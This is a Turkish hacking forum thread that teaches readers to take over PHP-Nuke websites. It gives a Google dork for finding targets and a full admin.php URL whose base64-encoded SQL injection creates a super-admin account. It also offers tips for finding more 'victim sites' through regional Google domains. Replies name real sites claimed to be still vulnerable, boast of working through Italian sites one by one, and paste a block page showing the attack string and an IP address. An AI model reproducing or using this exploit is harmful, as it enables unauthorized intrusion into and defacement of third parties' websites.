php-nuke hack(değişik)

sontezan

New member
Reaction score
0
Google'dan "Powered by PHP-Nuke inurl:/admin.php" die aratın sonu admin.php ile biten bir site bulun ve açın karşınıza kullancı adı ve pass soracaktır sonuna şunu akleyin

Kod:
?add_aid=hacker&add_name=God&add_pwd=lamer&[email protected]&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit=Create+Admin

yeni adress şöyle oolacak

Kod:
www.xxx.com/admin.php?add_aid=hacker&add_name=God&add_pwd=lamer&[email protected]&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit=Create+Admin

Eğer illegal oparation demez ve site normal açılırsa giriş yapıun oluo

Kullanıcı adına hacker
Şifreye lamer yazıp kont paneline ulaşın diğer yöntemden daha çok işliyor denedim çünkü

Uyarı:
Google'da aratacağınız kodu web'de aratmayın.Mesele www.google.de'ye girin sadece Almanca siteleri seçip orada aratın veya www.google.fr'ye girin Fransızca siteleri seçip orda aramaya yapın.Böylece daha fazla kurban site bulabilirsiniz.Bu bir arama taktiğidir.
Örnek site:
http://euro.numismatisme.com/admin.php geçenlerde denediğimde giriş yapmıştım eğer açığını kapatmadıysa hâlâ girilebiliyordur.İsterseniz girip kullanıcı adı "hacker" şifre "lamer" olarak bir giriş yapmayı deneyin.Bilmiyorum belki duruyordur.

Selametle

Bu açık tarih oldu denilenebilir.Zamanı geçti :)

Tarih oLdu ?? HaLa Veriy0rsunuz

ben üstte yazdığınız özür admin senin site hacklendi yazınıza ne güldüm ama :D

Kardeş Kaplı fln ama bazı geriler daha açığı kapatmamış...

örn:

www.naturfreundewgkk.com

Zuhahaha daha kimbilir kaç tane war...
Birtek türk sitelerinde yok böle basit açıklar yabancılarda war GARİP Bide yabancıların güvenliği daha iyi derler KOMİK.

SİTEDE ESHKİ YAZAR DERSENİZ SEN HACKLEMEDİN DİE BENİM NİCKİM ESHKİYDİ ZEKY YAPTIM SONRA YİNE ESHKİ DE KARAR KILDIM OKE...

bi siteye girdim Please, stop it. I'm a student and I need to sell few coins to pay my studies. So please, stop hacked my website. bu yazıodu:D

teker teker tüm italya sitelerini deniyorum

iyide sonuna demişsiniz..nerenin sonuna eklicez kullanıcı adına yazıyom sığmıyor..sonu nere buranın..
yardım pls..

You have been blocked from entering this site.

You have attempted an unknown attack on this site.

All of the following information has been gathered to assist the webmaster should this need to be reported to local or federal law enforcement.

If you think this is a mistake you can contact the site webmaster at webmaster(at)schuetzen-nieder-moos(dot)de.

Be SURE to include the following information in any email!
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: add_aid=hacker&add_name=God&add_pwd=lamer&[email protected]&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit=Create+Admin
GET String: add_aid=hacker&add_name=God&add_pwd=lamer&[email protected]&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit=Create Admin
POST String:
Referer: none
Request Method: GET
Remote Address: 88.231.127.162
Client IP: none
Forwarded For: none
Date Blocked: 2007-11-21 @ 12:16:11 CET GMT +0100
Block expires: Permanent
Bana böle sonuç verdi annnneeeeeeee ben kaçtım :)

Geri